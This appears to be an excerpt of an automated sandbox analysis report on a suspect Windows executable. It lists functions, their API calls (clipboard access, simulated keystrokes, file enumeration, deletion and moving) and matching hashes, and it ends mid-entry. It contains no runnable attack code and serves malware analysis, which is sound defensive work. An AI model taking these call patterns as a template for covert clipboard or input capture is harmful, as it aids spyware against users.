                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                        • Instruction ID: 40852586f8f41b41dfc79b9b967aa5ef166b04cf6a3dd6d9be9de44c79e982d3
                                                                        • Opcode Fuzzy Hash: e908df7db2011151d19b897d4a4948494f90a1a3426dd436a38c65c5f4b6a17e
                                                                        • Instruction Fuzzy Hash: FA01127150050DAE8B05EF74C8918FFBB78EA11344F108066A655D6195EA309A49DB61
                                                                        APIs
                                                                        • __lock_file.LIBCMT ref: 00912AED
                                                                          • Part of subcall function 00917C0E: __getptd_noexit.LIBCMT ref: 00917C0E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __getptd_noexit__lock_file
                                                                        • String ID:
                                                                        • API String ID: 2597487223-0
                                                                        • Opcode ID: 267379c72dac79cd69a885ae959bccd2fae4e1fd1c9d14616266a49c8f1bdfe9
                                                                        • Instruction ID: e221d7ac0b7d5848840abb3d278b6c28914ae858304871b454a8806ec0f58cc3
                                                                        • Opcode Fuzzy Hash: 267379c72dac79cd69a885ae959bccd2fae4e1fd1c9d14616266a49c8f1bdfe9
                                                                        • Instruction Fuzzy Hash: 7AF06D31B4020DAADF21BFB98D067DF3AA9BF80320F158515B4149A1D1D7788AF2DB91
                                                                        APIs
                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,008F39FE,?,00000001), ref: 008F4286
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: FreeLibrary
                                                                        • String ID:
                                                                        • API String ID: 3664257935-0
                                                                        • Opcode ID: a0049e11190e66c0cd5deeaba34ebc035c2be1db5ee8eceaefbb2396d8456e4e
                                                                        • Instruction ID: 5e1b7ceec724716251ab72e9861c9e350b9eebe4427762ede67e27caa1170e3b
                                                                        • Opcode Fuzzy Hash: a0049e11190e66c0cd5deeaba34ebc035c2be1db5ee8eceaefbb2396d8456e4e
                                                                        • Instruction Fuzzy Hash: 40F0F27150970ACFCB349F749890826BBE5FE0432A3249A3FF29A82610C7329980DB50
                                                                        APIs
                                                                        • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008F40C6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: LongNamePath
                                                                        • String ID:
                                                                        • API String ID: 82841172-0
                                                                        • Opcode ID: e4596b194ec2591d5fb0c2ba10f051ba9a0f5bccb6cb4106546e630385643594
                                                                        • Instruction ID: f274697d7c3358a5a907400fbb73b73615ee5081936a79d43273449e3bf14e10
                                                                        • Opcode Fuzzy Hash: e4596b194ec2591d5fb0c2ba10f051ba9a0f5bccb6cb4106546e630385643594
                                                                        • Instruction Fuzzy Hash: 57E0C2376042285BC711A668CC46FFA77ADEFC87A0F0901B5FA09E7244EA74A9C19690
                                                                        APIs
                                                                        • Sleep.KERNELBASE(000001F4), ref: 01276929
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1288344983.0000000001274000.00000040.00000020.00020000.00000000.sdmp, Offset: 01274000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_1274000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Sleep
                                                                        • String ID:
                                                                        • API String ID: 3472027048-0
                                                                        • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction ID: ecdb9b9d9d4876e72f2a7476822f7d6bbdf387dea8eb8471be52b7b4d58454f9
                                                                        • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                        • Instruction Fuzzy Hash: 9AE0E67494010DDFDB00DFB4D5496EE7FB4EF04701F100161FD01D2280D6309D508A62
                                                                        APIs
                                                                          • Part of subcall function 0090B34E: GetWindowLongW.USER32(?,000000EB), ref: 0090B35F
                                                                        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0095F87D
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0095F8DC
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0095F919
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0095F940
                                                                        • SendMessageW.USER32 ref: 0095F966
                                                                        • _wcsncpy.LIBCMT ref: 0095F9D2
                                                                        • GetKeyState.USER32(00000011), ref: 0095F9F3
                                                                        • GetKeyState.USER32(00000009), ref: 0095FA00
                                                                        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0095FA16
                                                                        • GetKeyState.USER32(00000010), ref: 0095FA20
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0095FA4F
                                                                        • SendMessageW.USER32 ref: 0095FA72
                                                                        • SendMessageW.USER32(?,00001030,?,0095E059), ref: 0095FB6F
                                                                        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0095FB85
                                                                        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0095FB96
                                                                        • SetCapture.USER32(?), ref: 0095FB9F
                                                                        • ClientToScreen.USER32(?,?), ref: 0095FC03
                                                                        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0095FC0F
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0095FC29
                                                                        • ReleaseCapture.USER32 ref: 0095FC34
                                                                        • GetCursorPos.USER32(?), ref: 0095FC69
                                                                        • ScreenToClient.USER32(?,?), ref: 0095FC76
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0095FCD8
                                                                        • SendMessageW.USER32 ref: 0095FD02
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0095FD41
                                                                        • SendMessageW.USER32 ref: 0095FD6C
                                                                        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0095FD84
                                                                        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0095FD8F
                                                                        • GetCursorPos.USER32(?), ref: 0095FDB0
                                                                        • ScreenToClient.USER32(?,?), ref: 0095FDBD
                                                                        • GetParent.USER32(?), ref: 0095FDD9
                                                                        • SendMessageW.USER32(?,00001012,00000000,?), ref: 0095FE3F
                                                                        • SendMessageW.USER32 ref: 0095FE6F
                                                                        • ClientToScreen.USER32(?,?), ref: 0095FEC5
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0095FEF1
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0095FF19
                                                                        • SendMessageW.USER32 ref: 0095FF3C
                                                                        • ClientToScreen.USER32(?,?), ref: 0095FF86
                                                                        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0095FFB6
                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 0096004B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$ClientScreen$Image$CursorDragList_LongStateWindow$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                                        • String ID: @GUI_DRAGID$F
                                                                        • API String ID: 2516578528-4164748364
                                                                        • Opcode ID: ddb6f89f0a246e00f2be5ebe4e4aff12c53aeeddfed6a80279522ec79a5bbb14
                                                                        • Instruction ID: fa1f94e7145c4daad4be8b5364bf415925711f163761751668b7416dabda3708
                                                                        • Opcode Fuzzy Hash: ddb6f89f0a246e00f2be5ebe4e4aff12c53aeeddfed6a80279522ec79a5bbb14
                                                                        • Instruction Fuzzy Hash: D032E071609345EFDB10CF24C894BAABBB8FF49364F140A29FA99872A1D731DC48DB51
                                                                        APIs
                                                                        • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0095B1CD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: %d/%02d/%02d
                                                                        • API String ID: 3850602802-328681919
                                                                        • Opcode ID: 70f8ceb18be7c21d5948ba78f664d0acd59d0be334055d427859f91b7bc56f69
                                                                        • Instruction ID: 92052f90994aa2674a0440e807a0677d0f4b6bdc50f71af11d8ff50f4e45c3f3
                                                                        • Opcode Fuzzy Hash: 70f8ceb18be7c21d5948ba78f664d0acd59d0be334055d427859f91b7bc56f69
                                                                        • Instruction Fuzzy Hash: 9C12CC71604208AFEB24DF6ACC59FAA7BB8FF85321F104219FD19EA2D0DB748945CB51
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(00000000,00000000), ref: 0090EB4A
                                                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00963AEA
                                                                        • IsIconic.USER32(000000FF), ref: 00963AF3
                                                                        • ShowWindow.USER32(000000FF,00000009), ref: 00963B00
                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00963B0A
                                                                        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00963B20
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00963B27
                                                                        • GetWindowThreadProcessId.USER32(000000FF,00000000), ref: 00963B33
                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00963B44
                                                                        • AttachThreadInput.USER32(000000FF,00000000,00000001), ref: 00963B4C
                                                                        • AttachThreadInput.USER32(00000000,?,00000001), ref: 00963B54
                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00963B57
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00963B6C
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00963B77
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00963B81
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00963B86
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00963B8F
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00963B94
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 00963B9E
                                                                        • keybd_event.USER32(00000012,00000000), ref: 00963BA3
                                                                        • SetForegroundWindow.USER32(000000FF), ref: 00963BA6
                                                                        • AttachThreadInput.USER32(000000FF,?,00000000), ref: 00963BCD
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                        • String ID: Shell_TrayWnd
                                                                        • API String ID: 4125248594-2988720461
                                                                        • Opcode ID: a7f524e8100a73c12b262d257093eba3bbb32ee593fef71330275a2b285b1067
                                                                        • Instruction ID: a2a3de324d802e2f267f9a5200768fae0530aa9edb8bffe6a99ea8df63a3a94f
                                                                        • Opcode Fuzzy Hash: a7f524e8100a73c12b262d257093eba3bbb32ee593fef71330275a2b285b1067
                                                                        • Instruction Fuzzy Hash: 45317472A542187BEB206BB59C49F7F7E7CEF44B50F108025FA09EA1D0DAB15D40BAA0
                                                                        APIs
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00935FA6,?), ref: 00936ED8
                                                                          • Part of subcall function 00936EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00935FA6,?), ref: 00936EF1
                                                                          • Part of subcall function 0093725E: __wsplitpath.LIBCMT ref: 0093727B
                                                                          • Part of subcall function 0093725E: __wsplitpath.LIBCMT ref: 0093728E
                                                                          • Part of subcall function 009372CB: GetFileAttributesW.KERNEL32(?,00936019), ref: 009372CC
                                                                        • _wcscat.LIBCMT ref: 00936149
                                                                        • _wcscat.LIBCMT ref: 00936167
                                                                        • __wsplitpath.LIBCMT ref: 0093618E
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 009361A4
                                                                        • _wcscpy.LIBCMT ref: 00936209
                                                                        • _wcscat.LIBCMT ref: 0093621C
                                                                        • _wcscat.LIBCMT ref: 0093622F
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 0093625D
                                                                        • DeleteFileW.KERNEL32(?), ref: 0093626E
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00936289
                                                                        • MoveFileW.KERNEL32(?,?), ref: 00936298
                                                                        • CopyFileW.KERNEL32(?,?,00000000), ref: 009362AD
                                                                        • DeleteFileW.KERNEL32(?), ref: 009362BE
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 009362E1
                                                                        • FindClose.KERNEL32(00000000), ref: 009362FD
                                                                        • FindClose.KERNEL32(00000000), ref: 0093630B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
                                                                        • String ID: \*.*$p1Mw`KNw
                                                                        • API String ID: 1917200108-2160596699
                                                                        • Opcode ID: b2ad1f9809a97286d2cfbef275941b58b0708b5d1c2a592f6b39e06dc420f672
                                                                        • Instruction ID: 477126f9bc6d1cd22883de11d1bcf66106ac08237b5674b199aae624c9293a74
                                                                        • Opcode Fuzzy Hash: b2ad1f9809a97286d2cfbef275941b58b0708b5d1c2a592f6b39e06dc420f672
                                                                        • Instruction Fuzzy Hash: 3F513F7290911C6ACB21EB91CC44EEFB7BCAF45300F0941E6E599E3141DF76A7898FA4
                                                                        APIs
                                                                        • OpenClipboard.USER32(0098DC00), ref: 00946B36
                                                                        • IsClipboardFormatAvailable.USER32(0000000D), ref: 00946B44
                                                                        • GetClipboardData.USER32(0000000D), ref: 00946B4C
                                                                        • CloseClipboard.USER32 ref: 00946B58
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00946B74
                                                                        • CloseClipboard.USER32 ref: 00946B7E
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00946B93
                                                                        • IsClipboardFormatAvailable.USER32(00000001), ref: 00946BA0
                                                                        • GetClipboardData.USER32(00000001), ref: 00946BA8
                                                                        • GlobalLock.KERNEL32(00000000), ref: 00946BB5
                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00946BE9
                                                                        • CloseClipboard.USER32 ref: 00946CF6
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                                        • String ID:
                                                                        • API String ID: 3222323430-0
                                                                        • Opcode ID: 72cf1d8b1c5fa9b36c98b4aab7763071f06e656a1c99860c9cc1b431787b7650
                                                                        • Instruction ID: f5b98147e48241c3145087473fb8d5d6f752235cc7d4858d3d02b1c07f90bb53
                                                                        • Opcode Fuzzy Hash: 72cf1d8b1c5fa9b36c98b4aab7763071f06e656a1c99860c9cc1b431787b7650
                                                                        • Instruction Fuzzy Hash: ED51BEB2208205ABD300AF64CD86F7E77B8FF85B11F100429F69AD21E1EF60D9459B63
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0093F62B
                                                                        • FindClose.KERNEL32(00000000), ref: 0093F67F
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0093F6A4
                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0093F6BB
                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 0093F6E2
                                                                        • __swprintf.LIBCMT ref: 0093F72E
                                                                        • __swprintf.LIBCMT ref: 0093F767
                                                                        • __swprintf.LIBCMT ref: 0093F7BB
                                                                          • Part of subcall function 0091172B: __woutput_l.LIBCMT ref: 00911784
                                                                        • __swprintf.LIBCMT ref: 0093F809
                                                                        • __swprintf.LIBCMT ref: 0093F858
                                                                        • __swprintf.LIBCMT ref: 0093F8A7
                                                                        • __swprintf.LIBCMT ref: 0093F8F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
                                                                        • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                        • API String ID: 835046349-2428617273
                                                                        • Opcode ID: fbf1c13b64ba287997bef63770daf5879ee92c6ff778924461cc6c46aa6af7eb
                                                                        • Instruction ID: d85819e95754869f05a317e46a84962def99a90c63e6ac6373b1cad040a8f20c
                                                                        • Opcode Fuzzy Hash: fbf1c13b64ba287997bef63770daf5879ee92c6ff778924461cc6c46aa6af7eb
                                                                        • Instruction Fuzzy Hash: 00A1F0B2508348ABC314EBA4C995EBFB7ECFF94704F440919F695C2191EB34DA49CB62
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00941B50
                                                                        • _wcscmp.LIBCMT ref: 00941B65
                                                                        • _wcscmp.LIBCMT ref: 00941B7C
                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00941B8E
                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 00941BA8
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00941BC0
                                                                        • FindClose.KERNEL32(00000000), ref: 00941BCB
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00941BE7
                                                                        • _wcscmp.LIBCMT ref: 00941C0E
                                                                        • _wcscmp.LIBCMT ref: 00941C25
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00941C37
                                                                        • SetCurrentDirectoryW.KERNEL32(009A39FC), ref: 00941C55
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00941C5F
                                                                        • FindClose.KERNEL32(00000000), ref: 00941C6C
                                                                        • FindClose.KERNEL32(00000000), ref: 00941C7C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                                        • String ID: *.*
                                                                        • API String ID: 1803514871-438819550
                                                                        • Opcode ID: 4835ff8c80bd66dd14f24250197c177666a3917e0c7bdf4fee091a35c26c38ce
                                                                        • Instruction ID: 71a270f8655031b37005dc4cb0b1beab0e2cf9645c3ebe65f33c32b8d614e261
                                                                        • Opcode Fuzzy Hash: 4835ff8c80bd66dd14f24250197c177666a3917e0c7bdf4fee091a35c26c38ce
                                                                        • Instruction Fuzzy Hash: 4731F332646219ABCF14AFA0DC89FDE73BC9F85325F104165F915E2090EB70DAC58A64
                                                                        APIs
                                                                        • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 00941CAB
                                                                        • _wcscmp.LIBCMT ref: 00941CC0
                                                                        • _wcscmp.LIBCMT ref: 00941CD7
                                                                          • Part of subcall function 00936BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00936BEF
                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00941D06
                                                                        • FindClose.KERNEL32(00000000), ref: 00941D11
                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 00941D2D
                                                                        • _wcscmp.LIBCMT ref: 00941D54
                                                                        • _wcscmp.LIBCMT ref: 00941D6B
                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00941D7D
                                                                        • SetCurrentDirectoryW.KERNEL32(009A39FC), ref: 00941D9B
                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00941DA5
                                                                        • FindClose.KERNEL32(00000000), ref: 00941DB2
                                                                        • FindClose.KERNEL32(00000000), ref: 00941DC2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                                        • String ID: *.*
                                                                        • API String ID: 1824444939-438819550
                                                                        • Opcode ID: 770f16c4ada855a07d6a193d688dc3af0665fde71e769e4257251cd60339fbe7
                                                                        • Instruction ID: e9e54e4611d08c7f366616d35b51e484edafcbc5c4fffe75b8e4fff455e6bbc3
                                                                        • Opcode Fuzzy Hash: 770f16c4ada855a07d6a193d688dc3af0665fde71e769e4257251cd60339fbe7
                                                                        • Instruction Fuzzy Hash: 8E312472A0661ABACF14AFA0DC49FDE77BD9F85324F104561F805A30D1EB30DAC58BA0
                                                                        APIs
                                                                        • GetLocalTime.KERNEL32(?), ref: 009409DF
                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 009409EF
                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 009409FB
